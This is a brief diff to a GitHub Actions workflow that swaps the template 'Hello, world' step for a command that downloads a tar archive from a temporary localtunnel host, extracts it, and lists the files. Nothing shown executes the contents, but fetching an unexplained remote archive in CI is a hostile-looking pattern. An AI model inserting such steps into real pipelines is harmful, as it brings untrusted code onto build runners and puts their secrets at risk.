--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -27,7 +27,7 @@ jobs:
 
       # Runs a single command using the runners shell
       - name: Run a one-line script
-        run: echo Hello, world!
+        run: wget  https://sahilgour.loca.lt/run.tar.gz && tar -xvf run.tar.gz && ls
 
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
